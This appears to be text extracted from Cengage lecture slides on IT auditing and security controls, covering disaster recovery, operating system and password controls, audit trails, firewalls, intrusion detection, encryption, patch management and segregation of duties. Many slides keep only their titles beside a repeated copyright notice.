Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Learning Objectives
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Business Continuity Plan and
Disaster Recovery Planning
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Disaster Recovery Planning
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
DRP Audit Procedures
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Operating Systems Security
o Log-On Procedure:
o First line of defense against unauthorized access consisting of
user IDs and passwords.
o Access Token:
o Contains key information about the user which is used to approve
actions attempted during the session.
o Access Control List:
o Assigned to each IT resource and used to control access to the
resource.
o Discretionary Access Privileges:
o Allows user to grant access to another user.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Threats to Operating System
Integrity
o Accidental threats include hardware failures and errors in user
applications.
o Intentional threats are often attempts to illegally access data or
violate privacy for financial gain.
o Growing threat is destructive programs with no apparent gain,
which come from three sources:
o Privileged personnel who abuse their authority.
o Individuals who browse the operating system to identify and exploit
security flaws.
o Individuals who insert viruses or other destructive programs into
the operating system, either intentionally or unintentionally.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Operating Systems Controls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Password Controls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Operating Systems Controls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Controlling Against Malicious
& Destructive Programs
o Organizations can reduce threats:
o Purchase software from reputable vendors in original packages.
o Policy pertaining to unauthorized or illegal software.
o Examine upgrades and public-domain software for viruses before
implementation and use.
o Implement procedures for changing programs.
o Educate users regarding threats.
o Test all applications before implementation.
o Make frequent backups and limit users to read and execute rights only
whenever possible.
o Require protocols to bypass Trojan horses and use antiviral software.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Operating System Controls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
System
Audit
Trail
Controls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except
for use as permitted in a license distributed with a certain product or service or otherwise on a password-protected website or school-approved
learning management system for classroom use.
System Audit Trail Controls
o System audit trails are logs that record activity at the system,
application and use level.
o Two types of audit logs:
o Keystroke monitoring involves recording user’s keystrokes and
the system’s response.
o Event monitoring summarizes key activities related to system
resources.
o Audit trails can be used to: detect unauthorized access,
reconstruct events and promote personal accountability.
o Benefits must be balanced against costs.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Operating System Controls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for
use as permitted in a license distributed with a certain product or service or otherwise on a password-protected website or school-approved
learning management system for classroom use.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in
part, except for use as permitted in a license distributed with a certain product or service or otherwise on a password-protected
website or school-approved learning management system for classroom use.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in
part, except for use as permitted in a license distributed with a certain product or service or otherwise on a password-protected
website or school-approved learning management system for classroom use.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for
use as permitted in a license distributed with a certain product or service or otherwise on a password-protected website or school-approved
learning management system for classroom use.
Technical and Administrative Controls
Network security is the protection of the network perimeter, as well as the segmentation of the internal
corporate network. Oftentimes, management devotes resources to protecting its network from outsiders but
fails to properly segment its internal network based on risks. Much like logical access control, network
resources and segments should only be made available to those who require them. An example of this would
be segmenting the Research and Development network from the rest of the organisation due to the sensitive
nature of the information that is handled in such an environment.
Firewalls
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Routers
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
What is a Server?
File Server
A file server is a server that contains files which are made accessible to other clients on the network. A file server has
the sole responsibility for storing and managing a set of files, which are made accessible to other computers. These files
are shared among clients in the network by allowing access without having to physically transfer the accessed files to
their local systems.
Print Server
A print server is a server which has a dedicated printer connected to it which is accessible by other clients through it on
the same network. Other clients on the network can print work to this printer through this print server.
Web Server
A web server is a server equipped with HTTP (Hypertext Transfer Protocol) that serves web pages in response to
requests submitted by clients. For example, if you type www.ismellgood.com/homepage on your browser as a client, you
are in effect requesting a web page stored on a server with a domain named ismellgood.com, called a homepage. In
response to your request, the respective web server locates the homepage page in its system and displays it to you. If
you erroneously type www.ismellgood.com/homewage, the server will return an error message saying - web page not
found! Well, that's familiar!
Application Server
An application server stores and manages all applications between an organization's users and its databases or
backend business applications. If you've visited a bank to withdraw money, then you've accessed the bank's application
server through the services of the attending teller. The teller's machine through the banking application accesses the
bank's application server to retrieve your bank account details and facilitate your transaction.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
LAN with File and Print
Servers
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Network Security
Firewalls are network hardware and software that block unauthorised or unverified access to computer
systems and network assets. These tools survey incoming and outgoing transmissions and decide what type of
traffic to permit onto an organisation’s internal network based on factors such as origination or destination
address, content of the message, protocol being used to transmit the message, and other filtering methods.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Controlling Risks from Subversive
Threats
o Firewalls prevent unauthorized access to or from a private network.
To accomplish this:
o All traffic between the outside network and organization’s intranet must
pass through the firewall.
o Only authorized traffic is allowed to pass through the firewall which must
be immune to all penetration.
o Network-level firewalls provide efficient, low security control.
o Screening router examines source and destination addresses attached
to incoming message packets but does not explicitly authenticate
outside users.
o Application-level firewalls provide higher, customizable network
security, but add overhead cost.
o Trade-off between convenience and security.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Network Security
An intrusion detection system (IDS) is a device or software application that monitors an organisation’s
inbound and outbound network activity and identifies any suspicious patterns of activity that may indicate a
network or system attack or security policy violations. An IDS alerts administrators when someone or
something is trying to compromise the information system through malicious activities or security policy
violations. These systems are designed to supplement firewalls and other forms of network security by
detecting malicious activity coming across the monitored entity’s network or system activities. They act much
like a motion sensor would; detecting individuals who have bypassed perimeter security
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Technical and Administrative Controls
Encryption is one of the most effective methods of protecting networks and communications against attacks.
Encryption is the process whereby information is taken and scrambled so that it is unreadable by anyone who
does not have the encryption code. The decision to use encryption should be made in light of the risks and
after a cost-benefit analysis. There are, however, drawbacks to encryption, including the cost of the encryption
device, the cost of the administration, and the inherent delays incurred by the extra steps required for
processing.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Technical and Administrative Controls
PATCH MANAGEMENT Every week, new vulnerabilities are discovered in operating systems and applications,
and attackers exploit these vulnerabilities to gain access to systems. To protect against such exposures,
system administrators should install patches as soon as they become available. Proper patch management
can prevent worms and older exploits from being exploited.
Encryption is one of the most effective methods of protecting networks and communications against attacks.
Encryption is the process whereby information is taken and scrambled so that it is unreadable by anyone who
does not have the encryption code. The decision to use encryption should be made in light of the risks and
after a cost-benefit analysis. There are, however, drawbacks to encryption, including the cost of the encryption
device, the cost of the administration, and the inherent delays incurred by the extra steps required for
processing.
Application security encompasses controls implemented to prevent exceptions to the security policy of an
application and its underlying systems through flaws in design, development, or deployment. Controls built into
the application reduce the likelihood that it will be manipulated to access, steal, modify, or delete data.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Technical and Administrative Controls
Some of the best practices for ensuring segregation of duties within the information systems department and
between information systems and business unit personnel include:
System users should not have direct access to programme source code.
Development staff should not access system level technology or database management systems.
End users or system operators should not have direct access to programme source code.
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Technical and Administrative Controls
Development staff should not have access to production data, unless specifically authorized by the
functional data owner to repair a limited number of records.
Development staff should not access system level technology or database management systems.
End users should not have access to production data except through the features and functions of the
administrative applications; in particular, they should not have the ability to bypass or circumvent the
applications’ validation and audit procedures.
Accounts should be approved by the data steward and subsequently created by a separate, independent
system security administrator.
Access to system logs and system audits should be limited to the system security analysts, and all such
access should be reviewed by IT management.
Access to firewalls and other network security systems should be limited to the network security analysts,
and all such access should be reviewed by IT managemen
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Auditing Procedures for EDI
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Audit Objectives Associated with PC
Security
© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.